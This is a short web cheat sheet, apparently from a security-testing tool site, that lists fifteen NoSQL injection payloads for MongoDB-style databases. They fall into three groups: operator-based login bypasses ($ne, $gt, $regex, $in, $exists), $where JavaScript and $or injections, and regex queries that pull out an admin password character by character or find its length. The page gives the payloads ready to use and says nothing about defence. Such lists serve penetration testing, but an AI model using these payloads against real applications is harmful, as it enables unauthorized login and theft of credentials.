NoSQL Injection Cheat Sheet

NoSQL injection payloads for MongoDB, CouchDB, and other NoSQL databases. (15 payloads)

MongoDB Auth Bypass

(6)

{"username": {"$ne": ""}, "password": {"$ne": ""}}

Not-equal operator bypass (JSON)

username[$ne]=&password[$ne]=

Not-equal via query params

{"username": {"$gt": ""}, "password": {"$gt": ""}}

Greater-than operator bypass

username[$regex]=.*&password[$regex]=.*

Regex match-all bypass

{"username": {"$in": ["admin", "root"]}, "password": {"$ne": ""}}

$in operator with common usernames

{"username": "admin", "password": {"$exists": true}}

$exists check bypass

Operator Injection

(5)

{"$where": "this.username == 'admin'"}

$where JavaScript injection

{"$where": "function() { return true; }"}

$where always-true function

{"username": {"$regex": "^adm"}}

Regex prefix matching

{"price": {"$gt": 0, "$lt": 1}}

Range query manipulation

{"$or": [{"username": "admin"}, {"username": "root"}]}

$or operator for multiple users

Blind Extraction

(4)

username=admin&password[$regex]=^a

Extract password char-by-char (a)

username=admin&password[$regex]=^ab

Extract password prefix (ab...)

{"username": "admin", "password": {"$regex": "^.{8}$"}}

Determine password length

{"username": {"$regex": "^.{0,5}$"}}

Find usernames by length

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

SQL Injection NoSQL Injection

Related Cheat Sheets

SQL Injection Cheat Sheet JWT Attacks Cheat Sheet

$loading...